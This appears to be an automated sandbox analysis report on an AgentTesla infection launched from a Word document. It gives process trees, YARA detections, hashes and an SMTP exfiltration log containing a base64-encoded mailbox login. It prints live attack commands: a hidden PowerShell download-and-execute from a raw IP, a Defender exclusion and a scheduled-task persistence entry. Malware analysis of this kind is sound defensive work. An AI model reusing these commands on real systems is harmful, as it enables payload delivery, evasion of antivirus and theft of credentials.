                                                                                                              Nov 25, 2021 18:16:47.266547918 CET49172587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:16:47.411499023 CET58749172208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:47.412118912 CET49172587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:47.557813883 CET58749172208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:47.708725929 CET58749172208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:47.709115028 CET49172587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:47.857166052 CET58749172208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:47.857582092 CET49172587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:48.021215916 CET58749172208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:48.021595001 CET49172587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:16:48.166672945 CET58749172208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:49.666822910 CET58749172208.91.199.224192.168.2.22250 2.0.0 Ok: queued as E66333A1B18
                                                                                                              Nov 25, 2021 18:16:55.161237001 CET49172587192.168.2.22208.91.199.224QUIT
                                                                                                              Nov 25, 2021 18:16:55.306260109 CET58749172208.91.199.224192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:55.699424982 CET58749173208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:55.699944973 CET49173587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:16:55.844575882 CET58749173208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:55.845048904 CET49173587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:55.990134954 CET58749173208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:56.137636900 CET58749173208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:56.138192892 CET49173587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:56.283674955 CET58749173208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:56.284219980 CET49173587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:56.354336977 CET49169587192.168.2.22208.91.199.223QUIT
                                                                                                              Nov 25, 2021 18:16:56.464593887 CET58749173208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:56.465066910 CET49173587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:16:56.506661892 CET58749169208.91.199.223192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:56.609827995 CET58749173208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:56.613157988 CET49173587192.168.2.22208.91.199.224.
                                                                                                              Nov 25, 2021 18:16:56.853490114 CET58749173208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 5A7EC3A1B1C
                                                                                                              Nov 25, 2021 18:16:56.962841034 CET58749174208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:56.963052034 CET49174587192.168.2.22208.91.198.143EHLO 141700
                                                                                                              Nov 25, 2021 18:16:57.112601995 CET58749174208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:57.113282919 CET49174587192.168.2.22208.91.198.143AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:57.263832092 CET58749174208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:57.416347027 CET58749174208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:57.416778088 CET49174587192.168.2.22208.91.198.143MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:57.567409992 CET58749174208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:57.568006992 CET49174587192.168.2.22208.91.198.143RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:57.732752085 CET58749174208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:57.733259916 CET49174587192.168.2.22208.91.198.143DATA
                                                                                                              Nov 25, 2021 18:16:57.882982016 CET58749174208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:59.406790972 CET58749174208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 9F9E878224E
                                                                                                              Nov 25, 2021 18:16:59.774890900 CET58749174208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 9F9E878224E

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: WINWORD.EXE PID: 236 Parent PID: 596

                                                                                                              General

                                                                                                              Start time:18:14:15
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                              Imagebase:0x13f670000
                                                                                                              File size:1423704 bytes
                                                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 1592 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:20
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 2804 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:21
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 2968 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:21
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: taskmg.exe PID: 1156 Parent PID: 1592

                                                                                                              General

                                                                                                              Start time:18:14:26
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\taskmg.exe"
                                                                                                              Imagebase:0x12d0000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 2924 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:29
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Imagebase:0x22300000
                                                                                                              File size:452608 bytes
                                                                                                              MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: schtasks.exe PID: 1176 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:30
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                                                                                                              Imagebase:0xde0000
                                                                                                              File size:179712 bytes
                                                                                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: taskmg.exe PID: 2784 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:34
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Imagebase:0x12d0000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: verclsid.exe PID: 1200 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:39
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\verclsid.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                                                                              Imagebase:0xffa10000
                                                                                                              File size:11776 bytes
                                                                                                              MD5 hash:3796AE13F680D9239210513EDA590E86
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: notepad.exe PID: 2856 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:41
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\notepad.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                              Imagebase:0xffe30000
                                                                                                              File size:193536 bytes
                                                                                                              MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: powershell.exe PID: 1592 Parent PID: 236 powershell.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 000007FF002507BA, Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.437149628.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df9734276b681ccacac5817fe0d49824c6d5e0bc55d45e832da8bca153c98846
                                                                                                                • Instruction ID: f2c179ba60d33a4277807b7cb642bd0746c9ae424f3452dbecf226764a612352
                                                                                                                • Opcode Fuzzy Hash: df9734276b681ccacac5817fe0d49824c6d5e0bc55d45e832da8bca153c98846
                                                                                                                • Instruction Fuzzy Hash: 56E0D811719D0B4FFB90666C684A3B573C1E758313F640076EC0CC2692DD39E8414381
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Analysis Process: powershell.exe PID: 2804 Parent PID: 236 powershell.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 000007FF002506E5, Relevance: .2, Instructions: 219COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.423800734.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9a000f4aa914866238767db859e62b106316dc3724b72dd447acd893f63750a
                                                                                                                • Instruction ID: 853029d8f56b3e4b52a5ac094c6631430bd5cbf629de246936cad90511483ff8
                                                                                                                • Opcode Fuzzy Hash: a9a000f4aa914866238767db859e62b106316dc3724b72dd447acd893f63750a
                                                                                                                • Instruction Fuzzy Hash: 33518A6190EBC24FE75357389C667A17FA0AF1B311F5E00FBC488CB0A3E9589859C762
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Analysis Process: taskmg.exe PID: 1156 Parent PID: 1592 taskmg.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 002B4AE0, Relevance: 1.9, Strings: 1, Instructions: 644COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fC'l
                                                                                                                • API String ID: 0-3541359436
                                                                                                                • Opcode ID: 4d58b92b482620aa5fde21728df5b9b03f57b4b8bcb377e2d88495348f4bde5b
                                                                                                                • Instruction ID: 08c88de21837efa152fa9e9dd5396e605929de170a5f155244a46759ac49b3eb
                                                                                                                • Opcode Fuzzy Hash: 4d58b92b482620aa5fde21728df5b9b03f57b4b8bcb377e2d88495348f4bde5b
                                                                                                                • Instruction Fuzzy Hash: 1BE14870D183588FDB11CFA8C894BDDBBF5BF4A304F24905AD409AB292E7B49985CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0610, Relevance: 3.8, Strings: 3, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $)$.
                                                                                                                • API String ID: 0-840003958
                                                                                                                • Opcode ID: ce9d83d83cf1699ce8fb847fb0c4eaac810cc702b38c3177e3f08c178ddce171
                                                                                                                • Instruction ID: a2bb022bdce6ff1c950760640c786d86859a019e223e4fc9ebe015c1e7e85019
                                                                                                                • Opcode Fuzzy Hash: ce9d83d83cf1699ce8fb847fb0c4eaac810cc702b38c3177e3f08c178ddce171
                                                                                                                • Instruction Fuzzy Hash: 3C21B47490026CCFCB64DF60D888BD8BBB1BB49315F1085E6D109A72A1DB349EC5DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0A72, Relevance: 3.8, Strings: 3, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $%$.
                                                                                                                • API String ID: 0-990611474
                                                                                                                • Opcode ID: b1ccd4bc62f35e6237aed7e7649ed3164fb28c230c4885a5e1859bd50b9b4f01
                                                                                                                • Instruction ID: 29656ac5158457b3e2e9bb2717b137f2dd81bc4ff4292820e431a3fdfc25ca94
                                                                                                                • Opcode Fuzzy Hash: b1ccd4bc62f35e6237aed7e7649ed3164fb28c230c4885a5e1859bd50b9b4f01
                                                                                                                • Instruction Fuzzy Hash: D811DB7480066CCFCB64CF60C8887E8B7B1AB49325F2095D5D109A72A1DB749EC5DF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0592, Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $.
                                                                                                                • API String ID: 0-3929174939
                                                                                                                • Opcode ID: fc1c0cef12c54e2cc4ed6e0bf845282c46882fcee6c4331d230173d9f84c078c
                                                                                                                • Instruction ID: eb13e919c01f3f247d16bee1f3d21725ee3ca9d3904eb05521b2da0e0d3d8975
                                                                                                                • Opcode Fuzzy Hash: fc1c0cef12c54e2cc4ed6e0bf845282c46882fcee6c4331d230173d9f84c078c
                                                                                                                • Instruction Fuzzy Hash: EE21CD74D01268CBCB64DF64D888BE8BBB5BB49315F2080E9D109AB2A1DB349EC5CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0C75, Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !$)
                                                                                                                • API String ID: 0-1972669455
                                                                                                                • Opcode ID: 25dff5beed9bb624fa00d6e4a0a592fbaa2483af34bacbe1a7e345ee0635eb5b
                                                                                                                • Instruction ID: 72425050e33d1c515af9939d6d2395873a2bd89f4d3e2a2da57a7ecb4396d236
                                                                                                                • Opcode Fuzzy Hash: 25dff5beed9bb624fa00d6e4a0a592fbaa2483af34bacbe1a7e345ee0635eb5b
                                                                                                                • Instruction Fuzzy Hash: 9221E23490422DCFCB64CF60D988BE9BBF1AF49314F1080EA8509A72A2DB359A85DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF071E, Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ($*
                                                                                                                • API String ID: 0-3813467706
                                                                                                                • Opcode ID: d43ca3c3621f72b411c976d0397655b3d06e61c5b8279fbdc12ae5a67af135f4
                                                                                                                • Instruction ID: a25069d9677a9105142badb754db63be1e844e0255e8ff2e4f50ed44278f04de
                                                                                                                • Opcode Fuzzy Hash: d43ca3c3621f72b411c976d0397655b3d06e61c5b8279fbdc12ae5a67af135f4
                                                                                                                • Instruction Fuzzy Hash: 5811B07190522CCFDB64CF68C984BE8B7B5FF09315F6080D9D209A7292CB359A85EF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00FF0B1E, Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.445811133.0000000000FF0000.00000040.00000001.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $.
                                                                                                                • API String ID: 0-3929174939
                                                                                                                • Opcode ID: a3e07b7dddeecd4c81c3f71b0eb8b16b64c2a20ba901874af930f3c77028e5bf
                                                                                                                • Instruction ID: 1dd77aa8cdafc02192f017c0bbc54d83574fb9cb0e2338413768e65d8ef8e6b5
                                                                                                                • Opcode Fuzzy Hash: a3e07b7dddeecd4c81c3f71b0eb8b16b64c2a20ba901874af930f3c77028e5bf
                                                                                                                • Instruction Fuzzy Hash: A411B374910268CFCB64DF60D898AD8B7B1BF89315F1085E9D109AB7A1DB349EC5CF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BC330, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002BC5F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 2cf46ae3ac5da6e6596516e0889e3f278a0f64b86914598eeb0b5787234031db
                                                                                                                • Instruction ID: 852b659381ef2e7cca2494735a54045c21fc534fd9800bf5697521a4af575321
                                                                                                                • Opcode Fuzzy Hash: 2cf46ae3ac5da6e6596516e0889e3f278a0f64b86914598eeb0b5787234031db
                                                                                                                • Instruction Fuzzy Hash: 5DC13470D1026A8FCB24CFA4C841BEEBBB1BF49304F1095AAD859B7240DB749A95CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002BBF98, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BC06B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.444863802.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
